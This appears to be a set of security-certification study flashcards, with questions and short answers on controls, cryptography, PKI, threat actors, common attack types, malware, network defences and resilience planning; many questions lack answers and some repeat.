What are the categories of security controls?
What do technical controls include?
What are managerial controls?
What are operational controls?
What do physical controls limit?
What is the purpose of preventive controls?
What are examples of deterrent controls?
What do detective controls do?
What are corrective controls used for?
What are compensating controls?
What is the CIA Triad?
What does confidentiality prevent?
Unauthorized disclosure of information
What is integrity in security?
Data can't be modified without detection
What does availability ensure?
Systems and networks must be operational
What is the role of encryption?
Encode messages for authorized access only
What does hashing do?
Map data of arbitrary length to fixed length
What are digital signatures used for?
Verify the integrity of data
What does availability ensure?
Information is accessible to authorized users.
What is redundancy in services?
Build services that will always be available.
What does fault tolerance mean?
System continues to run even when a failure occurs.
What is the purpose of patching?
Stability and closing security holes.
What is non-repudiation?
You can’t deny what you’ve said; there's no taking it back.
How does a signature add non-repudiation?
It proves you really did sign the contract.
What is proof of integrity?
Verify data does not change; remains accurate and consistent.
What is a hash in cryptography?
Represents data as a short string of text; a fingerprint.
What happens if the data changes?
The hash changes, indicating data integrity is compromised.
What does proof of origin ensure?
Proves the message was not changed and authenticates the source.
How is a digital signature created?
Hash the original plaintext and encrypt it with a private key.
What is the AAA framework?
Identification, Authentication, Authorization, and Accounting.
What is identification in the AAA framework?
This is who you claim to be, usually your username.
What does authentication verify?
Proves you are who you say you are, using passwords and factors.
What does authorization determine?
What access you have based on your identification and authentication.
What does accounting track?
Resources used, such as login attempts.
What are the three main components of security?
What does authentication verify?
What is the purpose of authorization?
To determine access rights based on identification and authentication.
What does accounting track in security?
How can a device be authenticated?
By placing a digitally signed certificate on the device.
What is a Certificate Authority (CA)?
An organization that creates and digitally signs certificates for devices.
What is the role of a CA's digital signature?
It is used to validate the certificate.
What does an authorization model help with?
It defines access rights by Roles, Organizations, Attributes, etc.
What is a simple relationship in authorization?
What is Gap Analysis?
A comparison of where you are with where you want to be.
What is the purpose of choosing a framework in Gap Analysis?
To work towards a known baseline.
Name a standard for information security management systems.
ISO/IEC 27001
What does Zero Trust in network security entail?
Everything must be verified; nothing is inherently trusted.
What are key elements of a Zero Trust approach?
What is the Zero Trust principle?
Everything must be verified. Nothing is inherently trusted. Use multi-factor authentication and encryption.
What are the planes of operation in networking?
What is a Policy Enforcement Point (PEP)?
The gatekeeper that allows, monitors, and terminates connections.
What does a Policy Decision Point do?
It makes authentication decisions.
What is the role of a Policy Engine?
Evaluates access decisions based on policy and other information.
What are security zones?
Categorize access based on trust levels: trusted, untrusted, internal, external.
What is the purpose of fencing in physical security?
Build a perimeter to prevent unauthorized access.
What does CCTV stand for?
Closed Circuit Television.
What is the function of access control vestibules?
Control access by managing door operations.
What is two-person integrity/control?
Minimizes exposure to attacks by requiring two individuals for access.
What is the purpose of physical protection at the reception area?
Validates identification of existing employees
What is two-person integrity/control?
Minimizes exposure to an attack; no single person has access to a physical asset
What should an access badge include?
How does lighting enhance security?
More light means more security; attackers avoid lit areas
What is the function of infrared sensors?
Detects infrared radiation in both light and dark; common in motion detectors
What do pressure sensors detect?
Detects a change in force; used in floor and window sensors
What is the purpose of honeypots?
Attracts attackers and traps them; creates a virtual world to explore
What are honeynets?
A real network that includes multiple devices; builds a larger deception network
What are honeyfiles?
Files with fake information designed to attract attackers; alerts sent if accessed
What are honeytokens used for?
Tracks malicious actors; adds traceable data to the honeynet
What is change management?
Process for making changes like upgrades, patches, or configuration changes
What is the change approval process?
Formal process to manage change; includes request forms, risk analysis, and approvals
What is the role of ownership in change management?
An individual manages the change process; ensures the process is followed
Who are considered stakeholders in change management?
Individuals or groups impacted by the change; they provide input
What can change management include?
What should be upgraded for shipping?
What is impact analysis?
What risks can occur without change?
What is a sandbox testing environment?
What is a backout plan?
When should changes be scheduled?
What is the standard operating procedure for change management?
What is the role of the technical team in change management?
What is an allow list?
What defines the scope of a change?
How can downtime be minimized?
What is required after implementing new configurations?
What can you do to recover from a power outage?
What should you do with legacy applications?
What are dependencies in system management?
How can documentation become outdated?
What is the purpose of version control?
What is Public Key Infrastructure (PKI)?
What is symmetric encryption?
What is asymmetric encryption?
What is key escrow?
What is important when managing encryption keys?
What is Alice’s public key?
What is ciphertext?
What does Alice use to decrypt ciphertext?
Her private key
What is asymmetric encryption?
Using a public key to encrypt and a private key to decrypt.
What is data at rest?
Data stored on devices like SSD, hard drives, USB drives, cloud storage.
What is an example of full-disk encryption?
BitLocker, FileVault
What is file encryption?
Encrypting individual files using EFS or third-party utilities.
What is transport encryption?
Protecting data while it traverses the network.
What does a VPN do?
Encrypts all data transmitted over the network.
What is the significance of cryptographic keys?
They determine the output of encrypted data, hash values, and digital signatures.
What is the typical length for symmetric keys?
Commonly 128-bit or larger.
What does key stretching do?
Makes a weak key stronger through multiple hashing processes.
What is a challenge of key exchange?
Sharing an encryption key securely over an insecure medium.
What is in-band key exchange?
Sending the key over the network protected by additional encryption.
What is a session key?
A symmetric key shared using asymmetric encryption for data encryption.
What is a session key?
A shared key used to encrypt data.
How should session keys be implemented?
How is a symmetric key created from asymmetric keys?
Using public and private key cryptography.
What does a Trusted Platform Module (TPM) provide?
What is a Hardware Security Module (HSM) used for?
What is a key management system?
A centralized manager for various keys across services.
What is a secure enclave?
A protected area for secrets, isolated from the main processor.
What is obfuscation?
The process of making something unclear or difficult to understand.
What is steganography?
Concealed writing; hiding information in plain sight.
What are common steganography techniques?
What are yellow dots on printers used for?
Tracking printed documents
What is audio steganography?
Modify audio files to hide messages
What is video steganography?
Use image steganography on video sequences
What is tokenization?
Replace sensitive data with non-sensitive placeholders
How is tokenization used in credit card processing?
Uses a temporary token during payment
What is data masking?
Hide some original data to protect PII
What do hashes represent?
Data as a short string, a message digest
What is a collision in hashing?
Different inputs create the same hash
Why shouldn't you use MD5?
It has a collision problem
What is salting in hashing?
Adding random data to a password before hashing
What is a digital signature?
Proves message integrity and source
What is blockchain?
A distributed ledger for tracking transactions
What is a digital certificate?
Binds a public key with a digital signature
What is a public key certificate?
Binds a public key with a digital signature and other details about the key holder.
What does a digital signature add?
Adds trust; PKI uses Certificate Authorities for additional trust.
What is X.509?
Standard format for digital certificates.
What are typical details in a digital certificate?
What is the root of trust?
An inherently trusted component, such as HSM or Certificate Authority.
What does a Certificate Authority (CA) do?
Digitally signs website certificates, providing trust.
What is a Certificate Signing Request (CSR)?
A request sent to the CA containing a public key to be signed.
What are self-signed certificates?
Internal certificates not signed by a public CA; used within an organization.
What is a wildcard certificate?
Supports many different domains; applies to all server names in a domain.
What is a Certificate Revocation List (CRL)?
Maintained by the CA; contains revoked certificates.
What is OCSP stapling?
Status information is stored on the certificate holder’s server and stapled into the SSL/TLS handshake.
What is OCSP?
Online Certificate Status Protocol for checking certificate revocation.
How is OCSP status included in SSL/TLS?
It is stapled into the handshake and signed by the CA.
What is a CSR?
Certificate Signing Request sent to a CA for validation.
What are the steps to create a certificate?
What is a threat actor?
An entity responsible for an event impacting another's safety.
What are the motivations of threat actors?
What defines nation-state attackers?
Government entities with massive resources and high sophistication.
What characterizes unskilled attackers?
Run pre-made scripts, motivated by disruption or data exfiltration.
What is a hacktivist?
A hacker motivated by philosophy or revenge, often sophisticated.
What is an insider threat?
Internal entity motivated by revenge or financial gain, with institutional knowledge.
What is organized crime in cybersecurity?
Professional criminals motivated by money, often very sophisticated.
What is shadow IT?
Working around internal IT, often building unauthorized systems.
What is Shadow IT?
What are threat vectors?
What is a common message-based vector?
What is a file-based vector?
What is vishing?
What is a vulnerable software vector?
What are unsecure network vectors?
What is the risk of open service ports?
What is the concern with default credentials?
What can removable devices do?
What are some social engineering attacks?
What is war dialing?
What is the purpose of input validation in browsers?
What is call tampering?
What is the significance of cloud usage in Shadow IT?
What expands the attack surface in an application?
More services
What must firewall rules allow?
Traffic to an open port
What should you do with default credentials?
Change them
What provides full control of a device?
The right credentials
What can be tampered with in the supply chain?
Infrastructure or manufacturing process
What is a risk of managed service providers (MSPs)?
Access to multiple customer networks
What was the 2013 Target breach related to?
Vendor access
What can counterfeit networking equipment install?
Backdoors
What is phishing?
Social engineering with spoofing
What should you check to avoid phishing?
The URL
What is business email compromise?
Attackers spoof email sources
What is typosquatting?
A type of URL hijacking
What is vishing?
Voice phishing over phone
What is smishing?
SMS phishing
What is the pretext in impersonation?
Setting a trap with an actor and story
What is a common tactic in identity fraud?
Using someone's personal information
What type of fraud involves credit cards?
Credit card fraud
What can attackers gain access to in bank fraud?
Your bank account
What is bank fraud?
What is loan fraud?
What is government benefits fraud?
How to protect against impersonation?
What is a watering hole attack?
What is required for executing a watering hole attack?
What happened in January 2017?
What is defense-in-depth?
What is misinformation/disinformation?
What is brand impersonation?
What is memory injection?
What is DLL injection?
What does memory forensics do?
What is a buffer overflow?
Overwriting a buffer of memory that spills over into other memory areas.
What do developers need to perform to prevent buffer overflows?
Bounds checking.
What is a race condition?
A programming issue where multiple processes happen simultaneously, potentially leading to errors.
What does TOCTOU stand for?
Time-of-check to time-of-use attack.
What can cause a reboot loop in systems?
Improper handling of file system problems, as seen in the Mars rover 'Spirit'.
What should you always do when installing software updates?
Keep your operating system and applications updated.
What is a best practice for software updates?
Always have a known-good backup.
Why should you confirm the source of updates?
To avoid installing potentially malicious software.
What is a common issue with malicious updates?
Not every update is equally secure.
What can help ensure the safety of installed applications?
Only install from trusted sources.
What should you do to verify app updates?
Visit the developer’s site directly - Don’t trust random update buttons or files
What do many operating systems require for apps?
They require signed apps - Don't disable security controls
What is the Solarwinds Orion supply chain attack?
Attackers added malicious code to updates - Reported in December 2020
What is a foundational computing platform?
An operating system (OS) - Everyone has one
How complex are operating systems?
Remarkably complex - Millions of lines of code
What is Patch Tuesday?
2nd Tuesday of each month - Normal month of Windows updates
What vulnerabilities were reported on May 9, 2023?
What is a best practice for OS vulnerabilities?
Always update - Monthly or on-demand updates
What is code injection?
Adding your own information into a data stream - Enabled by bad programming
What is SQL injection (SQLi)?
Putting your own SQL requests into an application - Shouldn't be allowed
How can SQL injection be executed?
Often executed in a web browser - Inject in a form or field
What is Cross-site Scripting (XSS)?
A common web app vulnerability - Takes advantage of user trust
What is a non-persistent (reflected) XSS attack?
Web site allows scripts in user input - Attacker emails a link with malicious script
What is a persistent (stored) XSS attack?
Attacker posts a message with payload - Everyone viewing the page gets it
What is a malicious payload?
A payload that spreads quickly to all viewers of a page, making it 'persistent'.
What happens when someone views a malicious message?
It can be posted to their page and propagate further.
What vulnerability did Aaron Guzman discover in Subaru?
A token that never expires, allowing unauthorized access.
What is a potential risk of a valid token?
Allows any service request, including adding an email to another's account.
How can you protect against XSS?
What is firmware?
The operating system inside hardware devices.
What does EOL stand for?
End of life, when a manufacturer stops selling a product.
What is EOSL?
End of service life, no longer supported or patched by the manufacturer.
What are legacy platforms?
Older devices running outdated software that may pose security risks.
What is a significant concern regarding technology EOSL?
Lack of security patches and updates for unsupported products.
What are virtualization vulnerabilities?
What is VM escape?
Breaking out of the VM to interact with the host OS or hardware.
What can you control after escaping the VM?
What happened in March 2017 at Pwn2Own?
What does the hypervisor manage?
The relationship between physical and virtual resources.
What percentage of organizations use MFA for management console users?
76% are not using MFA.
What is a common type of attack in the cloud?
Denial of Service (DoS).
What is authentication bypass?
Exploiting weak or faulty authentication.
What is SQL injection?
Getting direct access to a database.
What is a risk in the supply chain?
Attackers can infect any step along the chain.
What should be considered for service providers?
Ongoing security audits included in the contract.
What should be included with the contract for service providers?
Ongoing security audits of all providers
What was targeted in the Target Corp. breach?
40 million credit cards stolen
How was the HVAC firm infected in the Target breach?
Malware delivered in an email
What kind of credentials were stolen from the HVAC techs?
VPN credentials
What network was used to infect cash registers in the Target breach?
A wide-open Target network
What is a key factor in trusting hardware providers?
Supply chain cyber security
What should be controlled tightly among vendors?
Use a small supplier base
What should security be part of in design?
The overall design
What company was involved in a counterfeit product scandal in July 2022?
Cisco
What should be confirmed during software installation?
Digital signature
What significant attack involved Solarwinds Orion?
Solarwinds supply chain attack
What was compromised in the Solarwinds attack?
Software updates
What common vulnerability involves open permissions?
Leaving a door open for hackers
What should be done to protect admin accounts?
Disable direct login to root accounts
What protocols should be avoided due to lack of encryption?
Telnet, FTP, SMTP, IMAP
What should be used instead of default settings?
Change to custom configurations
What botnet exploits default configurations?
Mirai botnet
What do firewalls manage?
Traffic flows based on port number
What is important to manage access?
What should you do with firewall rulesets?
What are challenges in mobile device security?
What data do mobile devices often contain?
What is jailbreaking/rooting?
What is sideloading?
What are zero-day vulnerabilities?
What is a zero-day attack?
What is malware?
What types of malware exist?
How do you get malware?
What is ransomware?
What is ransomware?
Malware that encrypts files and demands payment for decryption.
How can you protect against ransomware?
What is a virus?
Malware that can reproduce itself and needs user execution to spread.
How do viruses spread?
Through file systems or networks by executing a program.
What are the types of viruses?
What is a fileless virus?
A stealth attack that operates in memory and avoids detection.
What is a worm?
Malware that self-replicates without user action, spreading via networks.
How do worms spread?
They self-propagate and can take over many systems quickly.
What is spyware?
Malware that spies on users, capturing data like keystrokes.
How can you protect against spyware?
What is bloatware?
Unwanted applications installed by manufacturers that use storage space.
How can you remove bloatware?
What are keyloggers?
Malware that captures keystrokes and sends them to attackers.
What can malware log?
What is a logic bomb?
A malicious code that waits for a predefined event to execute.
What is a time bomb?
A type of logic bomb that activates based on a specific time or date.
What happened on March 19, 2013 in South Korea?
Email with malicious attachment sent; Trojan installed malware.
What did the malware do on March 20, 2013?
Activated logic bomb, deleted storage and master boot record.
What is SCADA?
Supervisory Control and Data Acquisition system used in industrial control.
How can you prevent a logic bomb?
What is a rootkit?
A malicious software that modifies core system files and is often invisible to the OS.
How can you find and remove rootkits?
What are physical attacks?
Attacks that bypass digital security by gaining physical access to systems.
What is brute force in physical security?
Physically pushing through obstructions without needing a password.
What is RFID cloning?
Copying RFID badges or key fobs using duplicators.
What are environmental attacks?
Attacks targeting the operating environment, like HVAC and power systems.
What is a Denial of Service (DoS) attack?
An attack that overloads a service to make it unavailable.
What is a Distributed Denial of Service (DDoS) attack?
Using multiple computers to bring down a service.
What is a DDoS attack?
An attack that uses an army of computers to overwhelm a service, causing a traffic spike.
What is a botnet?
A network of infected computers controlled by an attacker.
What was the peak infection of the Zeus botnet?
Over 3.6 million PCs.
What is DNS poisoning?
Modifying a DNS server to redirect requests.
What is domain hijacking?
Gaining access to domain registration to control traffic flow.
What is URL hijacking?
Redirecting users from a mistyped URL to a malicious site.
What is typosquatting?
Taking advantage of misspellings in domain names.
What is a wireless deauthentication attack?
A DoS attack that disconnects users from a wireless network.
What does 802.11w address?
Encryption of certain management frames to protect against attacks.
What is RF jamming?
Interfering signals that prevent wireless communication.
What does wireless jamming do?
Prevents wireless communication - Transmits interfering signals - Decreases signal-to-noise ratio
What is the difference between interference and jamming?
Interference is unintentional - Jamming is intentional disruption
What is reactive jamming?
Jamming occurs only when someone else tries to communicate
What is an on-path attack?
Formerly known as man-in-the-middle - Redirects traffic without detection
What does ARP poisoning do?
An on-path attack on the local IP subnet - ARP lacks security
What is a replay attack?
An attacker reuses transmitted information - Requires raw network data access
What are browser cookies?
Stored information by the browser - Used for tracking and session management
What is session hijacking?
An attacker intercepts a session ID - Gains access using victim's credentials
What is pass the hash?
An attacker captures username and password hash - Uses them to authenticate as the victim
What is malicious code?
Code used to exploit vulnerabilities - Can be delivered through various techniques
What are ways to get into a well-secured system?
What are types of malicious code?
What protects against malicious code?
What is WannaCry ransomware?
What is SQL injection?
What is a replay attack?
What is privilege escalation?
What mitigates privilege escalation?
What are common injection attack types?
What is the purpose of bounds checking?
What is the role of HTTPS in security?
What are tools for information gathering?
What is cross-site scripting?
What is the CVE-2023-29336 vulnerability?
What is CVE-2023-29336?
Win32k Elevation of Privilege Vulnerability
Which systems are affected by Win32k Kernel driver vulnerability?
What privileges can an attacker gain from CVE-2023-29336?
SYSTEM privileges
What are cross-site requests?
Legitimate requests from different sources like websites and videos.
What does client-side code do?
Renders the page on the screen (HTML, JavaScript)
What does server-side code do?
Performs requests from the client (HTML, PHP)
What is Cross-site Request Forgery (CSRF)?
One-click attack that exploits user trust in a web application.
What is a significant oversight in web application development regarding CSRF?
Lack of anti-forgery techniques.
What is directory traversal?
Reading files from a web server outside the website’s directory.
What can attackers exploit in directory traversal?
Badly written web application code.
What is a birthday attack?
Finding two different plaintexts with the same hash value.
What is a hash collision?
Same hash value for two different plaintexts.
What vulnerability was identified with MD5?
Collisions identified in 1996.
What is a downgrade attack?
Forcing systems to use weaker encryption methods.
What is a downgrade attack?
Forces systems to use weaker encryption instead of strong encryption.
What vulnerability did the POODLE attack exploit?
TLS vulnerability that forced clients to fallback to SSL 3.0.
Why won't modern browsers fallback to SSL 3.0?
Due to significant cryptographic vulnerabilities.
What is SSL stripping?
An on-path attack that rewrites URLs from HTTPS to HTTP.
What is a plaintext password?
A password stored without encryption, making it readable.
What should you do if your application saves passwords as plaintext?
Get a better application that hashes passwords.
What is hashing a password?
Representing data as a fixed-length string, creating a message digest.
What is an example of a common hashing algorithm?
SHA-256, used in many applications.
What is a spraying attack?
Trying common passwords across multiple accounts to avoid lockouts.
What is a brute force attack?
Trying every possible password combination until the correct one is found.
What happens during an online brute force attack?
Attempts to log in repeatedly, often leading to account lockouts.
What is an indicator of compromise (IOC)?
An event indicating a potential intrusion, such as unusual network activity.
What can cause an account lockout?
Exceeded login attempts or administrative disabling of the account.
What does concurrent session usage refer to?
Multiple logins from different locations by the same user.
What is an attacker's goal regarding blocked content?
To remain undetected in the system for as long as possible.
What is a common reason attackers want to stay in a system?
What should you look for to prevent blocked content?
What types of segmentation can be used in a network?
What is the purpose of access control lists (ACLs)?
What can be included in ACL configurations?
What is an example of a permission in an ACL?
What is a unique method to allow applications in an allow list?
What does 'impossible travel' indicate in security?
What should be monitored for signs of an attack?
What does out-of-cycle logging refer to?
What can missing logs indicate?
What might attackers do with company data?
What may occur in conjunction with ransomware?
What is incredibly important for system security?
How often should updates be performed?
What does full disk encryption (FDE) do?
What is an example of full disk encryption?
What should rights and permissions be set to?
What must user accounts be limited to?
What is needed for configuration enforcement?
What should decommissioning policies include?
What is a method of threat protection?
What does a host-based firewall do?
What does system hardening include?
What is an example of file system encryption?
What type of monitoring aggregates information from devices?
What is the goal of encryption in data protection?
What should be included in extensive checks during configuration enforcement?
What is a host-based firewall?
What does a host-based Intrusion Prevention System (HIPS) do?
What should you do with open ports and services?
Why should you change default passwords?
What is the risk of unnecessary software?
What is a cloud responsibility matrix?
What are hybrid cloud considerations?
What is infrastructure as code?
What is serverless architecture?
What are microservices?
What is a monolithic application?
One big application that does everything, containing user interface, business logic, and data input/output.
What are APIs used for in microservices?
APIs serve as the 'glue' for microservices, allowing them to work together as a single application.
What are the benefits of microservices?
What is physical isolation in network infrastructure?
Devices are physically separate, requiring direct connections or switches for communication.
What is the purpose of VLANs?
VLANs provide logical segmentation, separating networks without physical isolation.
What are the three planes of SDN?
What is a centralized approach in security management?
Centralizes security management for correlated alerts and consolidated log analysis.
What is virtualization?
Running multiple operating systems on the same hardware, with each application instance having its own OS.
What are the challenges of a monolithic architecture?
Large codebase and change control challenges due to everything being in one application.
What is the responsibility matrix in microservices?
Defines how different components interact, including clients, APIs, and microservices.
What are the security concerns between on-premises and cloud?
On-premises offers full control but higher costs; cloud is centralized and generally less expensive.
What is virtualization?
Running many different operating systems on the same hardware.
What is an application container?
A standardized unit of software containing everything needed to run an application.
What does a container provide?
Isolated processes in a sandbox; self-contained applications.
What is an IoT sensor used for?
Heating and cooling, lighting.
What are examples of smart devices?
Home automation, video doorbells.
What is SCADA?
Supervisory Control and Data Acquisition System for large-scale industrial control.
What is a real-time operating system (RTOS)?
An OS with a deterministic processing schedule, critical for industrial equipment.
What defines embedded systems?
Hardware and software designed for a specific function or part of a larger system.
What is high availability (HA)?
Systems that are always on and available, often requiring redundancy.
What is the importance of availability in IT?
System uptime is crucial for accessing data and completing transactions.
What does resilience refer to in IT?
The ability to maintain availability and recover quickly after an incident.
What is MTTR?
Mean Time to Repair, a metric for recovery time.
What factors contribute to cost in IT infrastructure?
Initial installation, ongoing maintenance, and repair costs.
What is a key factor in ongoing maintenance?
Annual ongoing cost
What are replacement or repair costs?
You might need more than one
What are the tax implications of expenses?
Operating or capital expense
What is critical for responsiveness in applications?
Speed is an important metric
What contributes to application responsiveness?
All parts of the application contribute
What does scalability refer to?
How quickly and easily can we increase or decrease capacity?
What is essential for ease of deployment?
Consider orchestration / automation
What method can be used for risk transference?
Transfer the risk to a third-party
What is a critical aspect of ease of recovery?
How easily can you recover?
What does patch availability involve?
Bug fixes, security updates, etc.
What happens if patching isn’t an option?
Embedded systems may need additional security controls
What is a foundational element of infrastructure?
Power requirements
What is the compute engine?
More than just a single CPU
What is the purpose of firewalls in a network?
Separate trusted from untrusted
What do security zones simplify?
Security policies
What is an attack surface?
How many ways into your home?
What can be a vulnerability in applications?
Open ports
What are common vulnerabilities in security?
How to minimize the attack surface?
What contributes to security?
What is fail-open in security?
Data continues to flow when a system fails.
What is fail-closed in security?
Data does not flow when a system fails.
What is the difference between active and passive monitoring?
What does an Intrusion Prevention System (IPS) do?
Watches network traffic and stops intrusions before they enter the network.
What is a jump server?
A highly-secured device that provides access to protected network zones.
What is the function of a proxy?
Sits between users and external networks to handle requests on behalf of users.
What is a forward proxy?
An internal proxy used to protect and control user access to the Internet.
What is an open proxy?
A third-party, uncontrolled proxy that can pose significant security concerns.
What is a reverse proxy?
Handles inbound traffic from the Internet to internal services.
What is an application proxy?
A proxy that understands how an application works, often used for HTTP.
What is a forward proxy?
An 'internal proxy' used to protect and control user access to the Internet.
What is a reverse proxy?
Handles inbound traffic from the Internet to your internal service.
What is an open proxy?
A third-party, uncontrolled proxy that can pose security risks.
What is port security?
Authentication methods to control access on networks, used in both wired and wireless networks.
What does EAP stand for?
Extensible Authentication Protocol, an authentication framework.
What is IEEE 802.1X?
Port-based Network Access Control (NAC) that requires authentication before network access.
What are the roles in IEEE 802.1X?
What is load balancing?
Distributing load across multiple servers to ensure fault tolerance and performance.
What is active/active load balancing?
All servers are active and share the load; provides fault tolerance and fast convergence.
What is active/passive load balancing?
Some servers are active while others are standby; passive servers take over if active ones fail.
What are sensors in networking?
Devices that aggregate information from network devices, like intrusion prevention systems and logs.
What are collectors in networking?
Devices that gather data from sensors, such as SIEM consoles and syslog servers.
What is the role of a firewall?
Controls the flow of network traffic, protecting sensitive materials and controlling content.
What does a firewall control?
What are the protections provided by firewalls?
What is the difference between OSI layer 4 and OSI layer 7?
What does NGFW stand for?
Next-Generation Firewall
What is a VPN?
Virtual Private Network
What is the purpose of a web application firewall (WAF)?
What is the function of SSL/TLS VPN?
What is SD-WAN?
Software Defined Networking in a Wide Area Network
What does SASE stand for?
Secure Access Service Edge
What does a Unified Threat Management (UTM) appliance include?
What is the role of a VPN concentrator?
Encryption/decryption access device
What is content filtering in firewalls?
What is a VPN used for?
What does SD-WAN manage?
What is SASE?
What is the role of a VPN concentrator?
What are the types of data classifications?
What is regulated data?
What is trade secret?
What defines legal information?
What types of financial information exist?
What is the difference between human-readable and non-human readable data?
What are examples of hybrid data formats?
What does classifying sensitive data involve?
What are the data classifications?
What is Proprietary data?
Data that is the property of an organization, may include trade secrets, often unique to an organization.
What does PII stand for?
Personally Identifiable Information, data used to identify an individual.
What is included in PHI?
Health information associated with an individual, including health status and care records.
What is data at rest?
Data stored on a device like hard drives or SSDs, often encrypted.
What is data in transit?
Data transmitted over a network, also known as data in-motion, requires transport encryption.
What is data in use?
Data actively processing in memory, usually decrypted, can be vulnerable to attacks.
What is data sovereignty?
Data residing in a country is subject to that country's laws, including GDPR regulations.
What is geolocation used for?
Tracks location details, can manage data access based on user location.
What is geofencing?
Automatically allows or restricts access based on user location, e.g., office proximity.
What is the purpose of encryption?
To encode information into unreadable data, converting plaintext to ciphertext.
What is hashing?
Represents data as a short string of text, a one-way trip creating a message digest.
What is confusion in encryption?
The encrypted data is drastically different than the plaintext.
What does hashing represent?
Data as a short string of text, a message digest.
What is a key feature of hashing?
It's a one-way trip; impossible to recover the original message from the digest.
What is the purpose of hashing?
Used to store passwords and verify document integrity.
What is obfuscation?
Making something understandable very difficult to understand.
What does obfuscation help prevent?
The search for security holes.
What is masking?
A type of obfuscation that hides some original data.
What does masking protect?
Personally Identifiable Information (PII) and other sensitive data.
What is tokenization?
Replacing sensitive data with a non-sensitive placeholder.
How is tokenization used in credit card processing?
Uses a temporary token during payment to prevent misuse of captured card numbers.
What is the benefit of segmentation?
Separating data to reduce risk of a single breach affecting all data.
What does high availability (HA) mean?
Always on, always available system.
What is server clustering?
Combining two or more servers to operate as a single large server.
What is the purpose of load balancing?
Distributing load across multiple servers to optimize performance.
What is a hot site?
An exact replica of a primary site, constantly updated.
What is a hot site?
What is a cold site?
What is a warm site?
What is platform diversity?
What are multi-cloud systems?
What is continuity of operations planning (COOP)?
What is capacity planning?
What is the role of people in capacity planning?
What technology can help in capacity planning?
What is recovery testing?
What are tabletop exercises?
What can be costly and time-consuming in disaster preparedness?
Disaster drills
What is a method to assess disaster response without physical drills?
Tabletop exercises
What is often inevitable in infrastructure?
Failures
What should be created to ensure operational continuity during failures?
Redundant infrastructure
What should be tested with a simulated event?
Internal security
What is a method to test user security awareness?
Phishing email attacks
What does parallel processing improve?
Performance and recovery
What is incredibly important for data recovery?
Backups
What are the two types of backups?
Onsite and offsite backups
What is a benefit of offsite backups?
Data is available after a disaster
What should backup data be protected with?
Encryption
What is the foundation of technology that needs proper planning?
Power
What device provides short-term backup power?
Uninterruptible Power Supply (UPS)
What is needed for long-term power backup?
Generators
What is a snapshot in virtual environments?
An instant backup of an entire system
What is a snapshot in backup?
How often should you take a snapshot?
What is recovery testing?
What is replication in data backup?
What is journaling in data storage?
What are secure baselines?
How should you deploy baselines?
Why is hardening important?
What is critical for mobile devices security?
What is essential for workstations security?
What should be automated monthly in firmware management?
Patches
Which system should be connected for policy management?
Active Directory group policy
Why should unnecessary software be removed?
To limit threats
What are examples of network infrastructure devices?
What type of devices have embedded OS?
Purpose-built devices
What should be configured for authentication?
Custom authentication methods
What should be checked with the manufacturer?
Security updates
What should be secured in cloud infrastructure?
Cloud management workstation
What principle should be applied to cloud services?
Least privilege
What should be configured for devices accessing the cloud?
Endpoint Detection and Response (EDR)
What is a recommended backup strategy for cloud data?
Cloud to Cloud (C2C)
What types of servers are there?
What must be monitored and secured on servers?
Anti-virus and anti-malware
What does SCADA stand for?
Supervisory Control and Data Acquisition
What is essential for SCADA systems?
Extensive segmentation
What are embedded systems designed for?
Specific functions
What is a characteristic of RTOS?
Deterministic processing schedule
What should IoT devices have instead of weak defaults?
Changed passwords
What is a key aspect of Mobile Device Management (MDM)?
Centralized management
What does BYOD stand for?
Bring Your Own Device
What is a challenge of BYOD?
Difficult to secure
What does COPE stand for?
Corporate Owned, Personally Enabled
What is CYOD?
Choose Your Own Device
What are common security concerns for cellular networks?
What should be done to secure a wireless network?
What is the WPA2 PSK problem?
Brute-force attack on the pre-shared key (PSK) using the four-way handshake
What is WPA3?
Wi-Fi Protected Access 3, introduced in 2018
What does GCMP stand for?
Galois/Counter Mode Protocol
What is SAE in WPA3?
Simultaneous Authentication of Equals, a new authentication process
What is a message integrity check (MIC)?
Verifies that received data matches the original sent data
What is a weak PSK vulnerable to?
Brute-force attacks, especially with improved technology
What is the purpose of WPA3's mutual authentication?
Creates a shared session key without sending it across the network
What is required for Open System wireless authentication?
No authentication password is required
What is the main feature of WPA3-Personal?
Uses a pre-shared key (PSK) for authentication
What is an Open System in wireless security?
No authentication password is required.
What does WPA3-Personal use?
WPA2 or WPA3 with a pre-shared key; everyone uses the same 256-bit key.
What does WPA3-Enterprise do?
Authenticates users individually with an authentication server (i.e., RADIUS).
What are the components of the AAA framework?
What is RADIUS?
A common AAA protocol that centralizes authentication for users.
What does IEEE 802.1X provide?
Port-based Network Access Control (NAC); access only after authentication.
What is EAP?
Extensible Authentication Protocol; an authentication framework with various methods.
What is the purpose of input validation?
To validate actual input against expected input and correct it.
What are secure cookies?
Cookies with a Secure attribute; sent only over HTTPS and not for sensitive data.
What is Static Application Security Testing (SAST)?
A method to identify security flaws like buffer overflows and database injections.
What is code signing?
Digital signature of an application by the developer to confirm integrity and origin.
What is sandboxing?
Isolating applications so they cannot access unrelated resources.
What is a sandbox used for?
Where can sandboxing be applied?
What does application security monitoring provide?
What can be viewed in application security monitoring?
What is involved in the acquisition process?
What is asset tracking used for?
What should be included in asset monitoring?
What does enumeration of an asset list?
What is the purpose of media sanitization?
What methods exist for physical destruction of data?
What is a certificate of destruction?
What is important about data retention?
What is vulnerability scanning?
What is static code analysis used for?
What is dynamic analysis (fuzzing)?
What is the issue with verifying findings in security?
False positives are an issue.
What is dynamic analysis in security testing?
Sending random input to an application.
What are the types of testing involved in dynamic analysis?
What does dynamic analysis look for?
Who created the Fuzz Generator?
Professor Barton Miller at the University of Wisconsin.
What is the CERT Basic Fuzzing Framework?
A framework developed by Carnegie Mellon Computer Emergency Response Team.
What is the purpose of package monitoring?
To confirm the package is legitimate and safe before deployment.
What is threat intelligence?
Research on threats and threat actors.
What is OSINT?
Open-source intelligence from publicly available sources.
What does proprietary/third-party intelligence provide?
Compiled threat information that can be purchased.
What is the function of the Cyber Threat Alliance (CTA)?
Members share and validate threat intelligence submissions.
What is penetration testing (pentest)?
Simulating an attack to exploit vulnerabilities.
What is included in the rules of engagement?
Defines purpose, scope, and test parameters.
What can exploiting vulnerabilities lead to?
What can buffer overflows cause?
What are some vulnerability types to test?
What is a false positive?
A vulnerability is identified that doesn’t really exist.
What is a false negative?
A vulnerability exists, but you didn’t detect it.
What is CVSS?
Common Vulnerability Scoring System - scoring of a vulnerability from 0 to 10.
What is the National Vulnerability Database?
A synchronized database with the CVE list, providing enhanced search functionality.
What is the exposure factor?
Loss of value or business activity if the vulnerability is exploited, expressed as a percentage.
What are the steps in penetration testing?
What is responsible disclosure?
